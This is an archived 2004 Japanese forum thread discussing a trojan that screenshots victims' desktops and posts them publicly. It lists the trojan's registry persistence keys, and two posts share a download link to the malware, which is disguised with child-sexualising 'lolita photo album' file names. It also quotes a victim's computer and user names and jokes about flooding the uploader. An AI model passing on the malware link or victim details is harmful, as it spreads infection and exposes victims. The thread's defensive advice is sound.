5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【洒落】キンタマウィルスのWeb版

1 :番組の途中ですが名無しです:04/09/22 22:02:55 ID:YxR2tyUw
感染するとデスクトップをキャプされて、それを定期的にうpロダにあげて、
その画像へのリンクを特定スレに自動書き込みするウィルスが
はやってるらしい。みんな気をつけて!

キャプチャされたデスクトップがウィルスによって晒され続けてるスレ
【うpろだ】アップローダー案内所12【アプロダw】
http://idol.bbspink.com/test/read.cgi/ascii2d/1095856132/

関連スレ
セキュリティ板 ウィルス情報&質問 総合スレッド☆Part24
http://pc5.2ch.net/test/read.cgi/sec/1094383672/

【警報】Winnyを狙ったワーム・ウイルス情報 Part26
http://tmp4.2ch.net/test/read.cgi/download/1094872215/

実行結果:

追加されるファイル:
windows\shellsystem.exe 678kB

追加されるレジストリ:
HKEY_USER\.Default\Software\Microsoft\Windows\CurrentVersion\Run
shellsystem.exe :='C:\Windows\shellsystem.exe'

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
shellsystem.exe :='C:\Windows\shellsystem.exe'

2 :番組の途中ですが名無しです:04/09/22 22:03:10 ID:Si3tl8+j
>>2
氏ね キチガイ

3 :番組の途中ですが名無しです:04/09/22 22:03:12 ID:W8EWS8vN
>>1w

4 :番組の途中ですが名無しです:04/09/22 22:04:42 ID:Oe0PMQVy
>>1
私は苺で違法ダウンロードばかりしている犯罪者です
http://news13.2ch.net/test/read.cgi/news/1095854900/

5 :番組の途中ですが名無しです:04/09/22 22:04:45 ID:+S1xQPGL
413 私は苺で違法ダウンロードばかりしている犯罪者です RtHJvfX:10回目 New! 04/09/22 21:59:23 ID:W5b80hWO
私は苺で違法ダウンロードばかりしている犯罪者です
【コンピュータ名】VALKYRI
【ユーザー名】shin
【今こんな事やってます】http://v.isp.2ch.net/up/7f2d910ea1a7.jpg

6 :番組の途中ですが名無しです:04/09/22 22:05:45 ID:mI2e/v0I
>>2

7 :番組の途中ですが名無しです:04/09/22 22:06:53 ID:+S1xQPGL
474 [名無し]さん(bin+cue).rar sage 04/09/22 21:50:31 ID:XwcsDIdF
469-470
サンクスコ、解析してみる。
ご親切に、フォルダアイコンになってるね。
バイナリエディタで覗いてみただけでも、相当作りこまれてるのがわかる
「そんなスレッド/板ありません」を検知して、別スレに飛ぶ機能もある
おーい、こいつメール砲機能あるみたいだぞ

キンタマ亜種とか改造版じゃなくて、まったく新規に作ってるっぽいな。
しかも、かなり念入り。詳しくはもうちょっとお待ちを…

8 :番組の途中ですが名無しです:04/09/22 22:09:11 ID:lVZ1V5Gq
一応立ってる 次スレ利用でも問題ないか

私は苺で違法ダウンロードばかりしている犯罪者です
http://news13.2ch.net/test/read.cgi/news/1095854900/

9 :番組の途中ですが名無しです:04/09/22 22:09:42 ID:QYHpt0fp
おいおい、立てちゃったのか?
コンピュータネームの部分にry・・・

10 :番組の途中ですが名無しです:04/09/22 22:09:56 ID:VXSuEMJY
これと同じウィルスが数日前に放尿スレにあったんだよな。
ノートンで検出されないってのは怖いな。


767 名前:私は放尿絵で興奮する変態です[G4zsGnQECv:40回目] 投稿日:04/09/18(土) 15:10:02 ID:GhekIZuS

http://v.isp.2ch.net/up/63ea6ede343b.jpg

11 :番組の途中ですが名無しです:04/09/22 22:13:05 ID:QYHpt0fp
というわけで、イン→アウトをきちんと監視できるFW入れてない香具師は、気をつけな。

しかし感染しているやつらの中に、オンラインスキャンしているアホがいる。
アンチウイルスソフトすら使わないでネットやろうという方がどうかしとるな。

12 :番組の途中ですが名無しです:04/09/22 22:15:43 ID:g3JwB/MS
それ俺のことか。

13 :番組の途中ですが名無しです:04/09/22 22:16:29 ID:bgKdcKHr
アンチウイルスソフトって使えないね

14 :番組の途中ですが名無しです:04/09/22 22:18:29 ID:brvMQrYm
全然盛り上がってないなw

15 :番組の途中ですが名無しです:04/09/22 22:19:09 ID:lVZ1V5Gq
どっちの板もスレタイがわかりづらい

16 :番組の途中ですが名無しです:04/09/22 22:19:25 ID:v65eiURf
検出されないのはあたりまえ
ウイルス定義の更新は発見から最低でも数日かかる

17 :番組の途中ですが名無しです:04/09/22 22:19:25 ID:2lJ95Xgw
ウイルスゲットしたやつ、ウイルス会社に報告しとけよ。

18 :番組の途中ですが名無しです:04/09/22 22:20:57 ID:QYHpt0fp
しかし、ニュー即は例の騒ぎで勢いそがれたんだな・・・・・
普通ならここで大騒ぎの祭りだろ・・・・・
という訳で俺も祭りの現場に引っ込む・・・

19 :番組の途中ですが名無しです:04/09/22 22:21:05 ID:Wdp62q43
すばらしいウイルスだ

20 :番組の途中ですが名無しです:04/09/22 22:23:37 ID:zEIb5DdW
nyやっててもmp3と動画しか落とさないしな。
ダブルクイックなんかしない。

21 :番組の途中ですが名無しです:04/09/22 22:24:36 ID:RScqWRuR
ダブルクイック
ダブルクイック
ダブルクイック
ダブルクイック
ダブルクイック

22 :番組の途中ですが名無しです:04/09/22 22:25:11 ID:A+C1BecJ
俺もしたことないな

ダブルクイックなんて

23 :番組の途中ですが名無しです:04/09/22 22:28:08 ID:Kf2gkZBM
運のいいやろうだw
ttp://up.isp.2ch.net/up/4f811a8000d4.jpg


24 :番組の途中ですが名無しです:04/09/22 22:28:50 ID:3H85kFeC
おもしれー

25 :番組の途中ですが名無しです:04/09/22 22:29:19 ID:ZGB3wJMG
467 名前:[名無し]さん(bin+cue).rar 投稿日:04/09/22 21:36:30 ID:XwcsDIdF
キンタマ改造版だな。
節穴機能が付いてないだけましか。
そのトロイどこかで入手できないもんかなァ。激しく解析してみたいぞ(w
Webとかjpeg感染タイプが出てくると、結構脅威だろーな。
nyだけじゃなくて、世界的に笑える

469 名前:[名無し]さん(bin+cue).rar 投稿日:04/09/22 21:40:54 ID:yMfO9itd
>>467
ほれ
つttp://strawberry.web-sv.com/cgi/up/ia/up1360.zip
中身はロリータ写真集だw

26 :番組の途中ですが名無しです:04/09/22 22:29:56 ID:mROf+omZ
  ./  ̄/〃__〃   /  ̄/       /
    ―/  __ _/   ./ ―― / /
    _/   /   /   _/    _/ /_/
    /\___/ヽ
   /''''''   '''''':::::::\
  . |(●),   、(●)、.:| +
  |   ,,ノ(、_, )ヽ、,, .::::|    
.   |   `-=ニ=- ' .:::::::| +
   \  `ニニ´  .:::::/     +
,,.....イ.ヽヽ、ニ__ ーーノ゙-、.
:   |  '; \_____ ノ.| ヽ i
    |  \/゙(__)\,|  i |
    >   ヽ. ハ  |   ||   ←このへんをトリプルクイックすると
                    ダディの目が光るぞ


27 :番組の途中ですが名無しです:04/09/22 22:31:54 ID:jYGEWqdP
うpローだに対して田代兵器とかで妨害でも(ry

28 :番組の途中ですが名無しです:04/09/22 22:34:17 ID:QvALZ+7W
早く世界中のデスクトップさらせや

29 :番組の途中ですが名無しです:04/09/22 22:34:46 ID:ACm1R0lv
>>26
ダブルクイックってどうやるの?

30 :番組の途中ですが名無しです:04/09/22 22:35:27 ID:g3JwB/MS
右クイック
左クイック

31 :番組の途中ですが名無しです:04/09/22 22:36:28 ID:sdyz7KUS
ウィルスじゃなくて、自動投稿ソフトだろ。

32 :番組の途中ですが名無しです:04/09/22 22:36:51 ID:TSUeAlrz
ベンダーに送るから誰かファイル暮

33 :番組の途中ですが名無しです:04/09/22 22:38:35 ID:05mFKQbB
>>32
htt://strawberry.web-sv.com/cgi/up/ia/up1360.zip
の中にある EXEのフォルダをクリックしたら感染するらすぃ

34 :番組の途中ですが名無しです:04/09/22 22:40:42 ID:DTsNlVtZ
犯行予告版の亜種まーだ?

35 :番組の途中ですが名無しです:04/09/22 22:44:21 ID:7n4CarLw
ダブルクリックしても開きませんでしたのでウィルスではないと思います。

36 :番組の途中ですが名無しです:04/09/22 22:46:35 ID:ixrFWn2X
中身が3ファイル中全部exeじゃねえかよ

37 :番組の途中ですが名無しです:04/09/22 22:47:39 ID:t518gi0R
キンタマか

38 :番組の途中ですが名無しです:04/09/22 22:50:28 ID:eG4jL+Hi
てか.exeを開く時点で自業自得だろ

39 :番組の途中ですが名無しです:04/09/22 22:51:45 ID:05mFKQbB
オリは、>>32で求められたから、>>33を書いたまでだ。決してオリを責めるなよな!

40 :はりねずみ ◆HaRinezUmI :04/09/22 22:55:09 ID:K/Q0xlI4
これの怖いところはnyやってなくても発動ってことだよなー。
キンタマの時はとりあえずnyやらなければうpはされなかったし。

41 :番組の途中ですが名無しです:04/09/22 22:56:35 ID:39FBPRBV
>>33の落としてみた
これにひっかかるか普通・・・

42 :番組の途中ですが名無しです:04/09/22 22:59:35 ID:05mFKQbB
>>41
それの偽装バージョンが早くも出回ってるみたい

EXEとはワカランようになってるらすぃ

43 :番組の途中ですが名無しです:04/09/22 23:01:10 ID:39FBPRBV
>>42
偽装されたバージョンも回ってるのか
なんか爆発的に感染する予感・・・

44 :番組の途中ですが名無しです:04/09/22 23:03:34 ID:+7baFD3f
アイコンがフォルダの形してるだけで拡張子はexeだから
うっかり八ベエ以外はひっかからんだろ

45 :番組の途中ですが名無しです:04/09/22 23:04:16 ID:Kf2gkZBM
しかしexeをクリックしてしまうアホは後を絶たないな。
拡張子表示しろよ。。ファイラーくらい使えよ。

46 :番組の途中ですが名無しです:04/09/22 23:06:06 ID:aKLnJkSm
まあ自業自得ってことで

47 :はりねずみ ◆HaRinezUmI :04/09/22 23:06:06 ID:K/Q0xlI4
下手に広まると2ch(というかpinkch)&2chうpろだの鯖への攻撃になるな

48 :番組の途中ですが名無しです:04/09/22 23:06:48 ID:+7baFD3f
ってかもううpロダ死んでるしな

49 :番組の途中ですが名無しです:04/09/22 23:14:15 ID:VXSuEMJY
>>48
死んではいない。重いだけ。DLソフト使え。

50 :番組の途中ですが名無しです:04/09/22 23:19:24 ID:aKLnJkSm
普段糞重いうpロダがさらに重くなってるしな
作者アホだろ

51 :番組の途中ですが名無しです:04/09/22 23:19:27 ID:ZGB3wJMG
ttp://marmotfarm.com/cgi-bin/upload2/source/up49239.zip

SS詰め合わせ


52 :番組の途中ですが名無しです:04/09/22 23:21:40 ID:cnePuFKY
>>33
怪しさ大爆発だな

53 :番組の途中ですが名無しです:04/09/22 23:27:32 ID:39FBPRBV
本危→田代→webキンタマ
祭り続きすぎ・・・

54 :番組の途中ですが名無しです:04/09/22 23:31:02 ID:QYHpt0fp
で、さびしいので上げ。


マジで何とかしてやらんと・・・・exe実行すアホもアホだが・・・・
それよりロダの管理者に誰か知らせたのかよ。

55 :番組の途中ですが名無しです:04/09/22 23:33:08 ID:05mFKQbB
302 名前:番組の途中ですが名無しです[sage] 投稿日:04/09/22(水) 23:30:56 ID:hJ0hBeMD
269 名前:まとめ [] 投稿日:04/09/22 23:26:56 ID:SSCgnDjW    New!!
■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■
苺にフォルダのアイコンをしたzipがうpされる。中身は下記の3つのexe:
  (写真集) (ロリータ) 水原友里.exe
  (写真集) (ロリータ) 相田香奈子.exe
  コピー 〜 (写真集) (ロリータ) 河瀬菜実.exe
これを実行すると、デスクトップのスクリーンショットがうpされ、それが
半角二次元板の特定スレに書き込まれる。
そのスレは、「アップローダー」をスレタイに含むスレのうち、一番上に
上がっているスレ。
■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■

56 :番組の途中ですが名無しです:04/09/23 00:17:28 ID:d5jfu6Iu
ユーザー名の変更
http://www.windowsfan.com/xp/tips/contents/setting/set_user03.htm
コンピュータ名の変更
http://www.windowsfan.com/xp/tips/contents/lan/lan_name01.htm

本名を吊るされないために

57 :番組の途中ですが名無しです:04/09/23 00:56:32 ID:BMDciSf4
>>45
ファイラーを使うのはキモヲタくらいだろ

58 :番組の途中ですが名無しです:04/09/23 03:45:28 ID:qngMVmU1
キンタマと違い、製作者足がつくんじゃないの。

13 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.02 2018/11/22 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)